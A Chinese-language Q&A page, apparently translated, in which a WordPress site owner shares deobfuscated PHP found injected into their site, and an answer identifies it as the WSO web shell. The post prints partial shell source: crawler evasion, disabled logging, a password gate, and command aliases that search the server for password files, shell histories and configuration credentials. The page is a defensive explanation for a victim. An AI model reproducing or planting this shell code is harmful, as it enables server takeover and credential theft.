问题描述
不幸的是,我不是PHP程序员,也不完全能够理解以下代码中发生的情况。
它是从注入到Wordpress目录中的php文件中提取的。 经过几次base64和解压缩后,我能够得到这个信息:
<?php ?><?php
/* Reject search engines */
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array('Google','Slurp','MSNBot','ia_archiver','Yandex','Rambler');
if (preg_match('/' . implode('|',$userAgents) . '/i',$_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
/* Settings */
$color = '#12ff4f';
$default_charset = 'Windows-1251';
//$auth_pass='2ff14d14e063ac36b593e3d437005300ea2f77bb';//memes
/* Shell Setup */
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('allow_url_fopen',true);
@ini_set("allow_url_include",true);
@set_time_limit(0);
/*More Shell Setup*/
if (get_magic_quotes_runtime()) @set_magic_quotes_runtime(0);
if (get_magic_quotes_gpc()) {
function WSOstripslashes($arr) {
return is_array($arr) ? array_map('WSOstripslashes',$arr) : stripslashes($arr);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function WSOb64decode($arr) {
return is_array($arr) ? array_map('WSOb64decode',$arr) : base64_decode($arr);
}
function WSOsetcookie($k,$v) {
$_COOKIE[$k] = $v;
setcookie($k,$v);
}
if (!empty($auth_pass)) {
if (isset($_POST['pass']) && (sha1($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']),base64_encode($_POST['pass']));
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) ]) || (sha1(base64_decode($_COOKIE[md5($_SERVER['HTTP_HOST']) ])) != $auth_pass)) die('<form method=post>Password: <input type=password name=pass><input type=submit value=">>"></form>');
}
$_POST = WSOb64decode($_POST);
$os = (strtolower(substr(PHP_OS,3)) == 'win') ? 'win' : 'nix';
$safe_mode = @ini_get('safe_mode');
if (!$safe_mode) error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if (isset($_POST['c'])) @chdir($_POST['c']);
$cwd = @getcwd();
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
$aliases = array('List dir' => 'ls -lha','list file attributes on a Linux second extended file system' => 'lsattr -va','show opened ports' => 'netstat -an | grep -i listen','process status' => 'ps aux','Find' => '','find suid' => 'find / -type f -perm -04000 -ls','find suid in current dir' => 'find . -type f -perm -04000 -ls','find sgid' => 'find / -type f -perm -02000 -ls','find sgid files in current dir' => 'find . -type f -perm -02000 -ls','find config.inc.php' => 'find / -type f -name config.inc.php','find config*' => 'find / -type f -name "config*"','find config* in current dir' => 'find . -type f -name "config*"','find writable folders and files' => 'find / -perm -2 -ls','find writable folders and files in current dir' => 'find . -perm -2 -ls','find service.pwd' => 'find / -type f -name service.pwd','find service.pwd files in current dir' => 'find . -type f -name service.pwd','find .htpasswd' => 'find / -type f -name .htpasswd','find .htpasswd files in current dir' => 'find . -type f -name .htpasswd','find .bash_history' => 'find / -type f -name .bash_history','find .bash_history files in current dir' => 'find . -type f -name .bash_history','find .fetchmailrc' => 'find / -type f -name .fetchmailrc','find .fetchmailrc files in current dir' => 'find . -type f -name .fetchmailrc','Locate' => '','locate httpd.conf' => 'locate httpd.conf','locate vhosts.conf' => 'locate vhosts.conf','locate proftpd.conf' => 'locate proftpd.conf','locate psybnc.conf' => 'locate psybnc.conf','locate my.conf' => 'locate my.conf','locate admin.php' => 'locate admin.php','locate cfg.php' => 'locate cfg.php','locate conf.php' => 'locate conf.php','locate config.dat' => 'locate config.dat','locate config.php' => 'locate config.php','locate config.inc' => 'locate config.inc','locate config.inc.php' => 'locate config.inc.php','locate config.default.php' => 'locate config.default.php','locate config*' => 'locate config','locate .conf' => 'locate ".conf"','locate .pwd' => 'locate ".pwd"','locate .sql' => 'locate ".sql"','locate .htpasswd' => 'locate ".htpasswd"','locate .bash_history' => 'locate ".bash_history"','locate .mysql_history' => 'locate ".mysql_history"','locate .fetchmailrc' => 'locate ".fetchmailrc"','locate backup' => 'locate backup','locate dump' => 'locate dump','locate priv' => 'locate priv');
if ($os == 'win') {
$home_cwd = str_replace('\',' / ',$home_cwd);$cwd=str_replace('\',$cwd);$aliases=array('ListDirectory'=>'dir','Findindex . phpincurrentdir'=>'dir / s / w / bindex . php','Find * config * . phpincurrentdir'=>'dir / s / w / b * config * . php','Showactiveconnections'=>'netstat - an','Showrunningservices'=>'netstart','Useraccounts'=>'netuser','Showcomputers'=>'netview','ARPTable'=>'arp - a','IPConfiguration'=>'ipconfig / all');}
if($cwd[strlen($cwd)-1]!=' / ')$cwd.=' / ';
if(!function_exists('posix_getpwuid')&&(strpos($GLOBALS['disable_functions'],'posix_getpwuid')===false)){function posix_getpwuid($p){return false;}}
if(!function_exists('posix_getgrgid')&&(strpos($GLOBALS['disable_functions'],'posix_getgrgid')===false)){function posix_getgrgid($p){return false;}}
... [full code in pastebin]
感谢您的理解! 谢谢
解决方法
恶意用户利用漏洞时要做的第一件事是他们试图使有效载荷落在目标服务器上-通常,该有效载荷包括后门或其他机制来执行任意代码和命令,例如编辑文件或上传更多文件。
您共享的代码对于漏洞利用来说非常容易读取!通常,利用有效载荷会被编码或“模糊化”,从而使它们几乎不可读,并且使病毒检测软件难以检测其特征。但是,您不必逐行遵循它即可看到它设置了HTML Web表单并允许执行某些文件和目录命令。这里的有效负载似乎是一个Web Shell(这是一种常见的有效负载)-即HTML驱动的应用程序,攻击者可以通过该应用程序导航您的文件系统。它似乎是WSO Webshell。
攻击者拥有(web)Shell访问权限后会做什么?完全是另一个问题。如果攻击者可以访问网站,则他们可以更改文件(例如,他们可以修改登录名或付款方式,以便他们收集/发送电子邮件凭据),可以执行任意代码(例如,将您的Web服务器变成要招募的机器人)在其他站点的DDoS攻击中),他们经常试图删除您对服务器的访问权限(例如,通过删除SSH密钥或更改服务器登录名),然后他们可能勒索您以勒索赎金。
I was once offered $5k/month to hack WordPress sites,因为(那个家伙声称),接管网站使他能够从这些网站收取广告收入。显然,这是一项有利可图的业务。
取决于事物的设置方式,它们也许可以在网上模拟您的身份,或者找到使自己更深入网络的方式(例如,窃取电子邮件或操纵投票计数)。专业的安全审核将有助于确定各种攻击的风险和风险。
设置时间 控制面板
错误1:Request method ‘DELETE‘ not supported 错误还原:...